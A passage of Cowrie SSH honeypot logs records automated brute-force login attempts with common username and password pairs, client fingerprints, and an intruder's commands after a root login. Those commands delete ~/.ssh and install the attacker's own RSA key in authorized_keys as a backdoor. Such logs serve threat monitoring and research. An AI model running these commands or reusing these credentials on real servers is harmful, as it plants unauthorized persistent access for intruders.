dsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:16:17.790911Z","src_ip":"212.227.125.160","session":"f56ce446ac6d"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:18.020430Z","src_ip":"212.227.125.160","session":"f56ce446ac6d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:19.191118Z","src_ip":"212.227.125.160","session":"f56ce446ac6d"}
{"eventid":"cowrie.session.closed","duration":30.96645426750183,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:23.618695Z","src_ip":"212.227.125.160","session":"231c4dad7739"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1273,"dst_ip":"1.2.3.4","dst_port":22,"session":"670efb8dd952","protocol":"ssh","message":"New connection: 102.88.137.80:1273 (1.2.3.4:22) [session: 670efb8dd952]","sensor":"my-vps","timestamp":"2025-08-31T01:16:25.403478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:16:25.405304Z","src_ip":"102.88.137.80","session":"670efb8dd952"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:16:25.529051Z","src_ip":"102.88.137.80","session":"670efb8dd952"}
{"eventid":"cowrie.login.success","username":"root","password":"sz@123456","message":"login attempt [root/sz@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:16:26.066236Z","src_ip":"102.88.137.80","session":"670efb8dd952"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:16:26.330879Z","src_ip":"102.88.137.80","session":"670efb8dd952"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:16:26.331562Z","src_ip":"102.88.137.80","session":"670efb8dd952"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:16:26.332724Z","src_ip":"102.88.137.80","session":"670efb8dd952"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:26.456513Z","src_ip":"102.88.137.80","session":"670efb8dd952"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:16:26.761716Z","src_ip":"102.88.137.80","session":"670efb8dd952"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:16:26.762414Z","src_ip":"102.88.137.80","session":"670efb8dd952"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:16:26.887571Z","src_ip":"102.88.137.80","session":"670efb8dd952"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:26.888410Z","src_ip":"102.88.137.80","session":"670efb8dd952"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":17216,"dst_ip":"1.2.3.4","dst_port":22,"session":"baa0de065a92","protocol":"ssh","message":"New connection: 102.88.137.80:17216 (1.2.3.4:22) [session: baa0de065a92]","sensor":"my-vps","timestamp":"2025-08-31T01:16:27.009458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:16:27.010619Z","src_ip":"102.88.137.80","session":"baa0de065a92"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:16:27.133501Z","src_ip":"102.88.137.80","session":"baa0de065a92"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:27.664849Z","src_ip":"102.88.137.80","session":"baa0de065a92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34300,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7aea32c900e","protocol":"ssh","message":"New connection: 212.227.125.160:34300 (1.2.3.4:22) [session: c7aea32c900e]","sensor":"my-vps","timestamp":"2025-08-31T01:16:28.034581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:16:28.035674Z","src_ip":"212.227.125.160","session":"c7aea32c900e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:16:28.110016Z","src_ip":"212.227.125.160","session":"c7aea32c900e"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:16:28.393633Z","src_ip":"212.227.125.160","session":"c7aea32c900e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:16:29.178736Z","src_ip":"212.227.125.160","session":"c7aea32c900e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:16:29.179498Z","src_ip":"212.227.125.160","session":"c7aea32c900e"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49538,"dst_ip":"1.2.3.4","dst_port":22,"session":"491cc521a409","protocol":"ssh","message":"New connection: 102.88.137.80:49538 (1.2.3.4:22) [session: 491cc521a409]","sensor":"my-vps","timestamp":"2025-08-31T01:16:29.181383Z"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:29.182266Z","src_ip":"102.88.137.80","session":"baa0de065a92"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:16:29.182918Z","src_ip":"102.88.137.80","session":"491cc521a409"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:29.290954Z","src_ip":"212.227.125.160","session":"c7aea32c900e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:29.291969Z","src_ip":"212.227.125.160","session":"c7aea32c900e"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:16:29.305434Z","src_ip":"102.88.137.80","session":"491cc521a409"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:16:29.809261Z","src_ip":"102.88.137.80","session":"491cc521a409"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:29.933516Z","src_ip":"102.88.137.80","session":"670efb8dd952"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:29.934337Z","src_ip":"102.88.137.80","session":"491cc521a409"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39892,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4deb7085624","protocol":"ssh","message":"New connection: 212.227.125.160:39892 (1.2.3.4:22) [session: a4deb7085624]","sensor":"my-vps","timestamp":"2025-08-31T01:16:38.148287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:16:38.162590Z","src_ip":"212.227.125.160","session":"a4deb7085624"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:16:38.222684Z","src_ip":"212.227.125.160","session":"a4deb7085624"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:38.621335Z","src_ip":"212.227.125.160","session":"a4deb7085624"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:39.718553Z","src_ip":"212.227.125.160","session":"a4deb7085624"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56204,"dst_ip":"1.2.3.4","dst_port":22,"session":"22d27af42d5e","protocol":"ssh","message":"New connection: 212.227.235.229:56204 (1.2.3.4:22) [session: 22d27af42d5e]","sensor":"my-vps","timestamp":"2025-08-31T01:16:42.752204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:16:43.657928Z","src_ip":"212.227.235.229","session":"22d27af42d5e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:16:43.659015Z","src_ip":"212.227.235.229","session":"22d27af42d5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39460,"dst_ip":"1.2.3.4","dst_port":22,"session":"73b87d48b9d1","protocol":"ssh","message":"New connection: 212.227.125.160:39460 (1.2.3.4:22) [session: 73b87d48b9d1]","sensor":"my-vps","timestamp":"2025-08-31T01:16:48.309989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:16:48.311091Z","src_ip":"212.227.125.160","session":"73b87d48b9d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:16:48.384597Z","src_ip":"212.227.125.160","session":"73b87d48b9d1"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:48.655400Z","src_ip":"212.227.125.160","session":"73b87d48b9d1"}
{"eventid":"cowrie.login.failed","username":"dev","password":"admin123","message":"login attempt [dev/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:49.797394Z","src_ip":"212.227.235.229","session":"22d27af42d5e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:49.811736Z","src_ip":"212.227.125.160","session":"73b87d48b9d1"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:51.930850Z","src_ip":"212.227.235.229","session":"22d27af42d5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58034,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9acbfeffb2e","protocol":"ssh","message":"New connection: 212.227.125.160:58034 (1.2.3.4:22) [session: f9acbfeffb2e]","sensor":"my-vps","timestamp":"2025-08-31T01:16:58.407854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:16:58.408565Z","src_ip":"212.227.125.160","session":"f9acbfeffb2e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh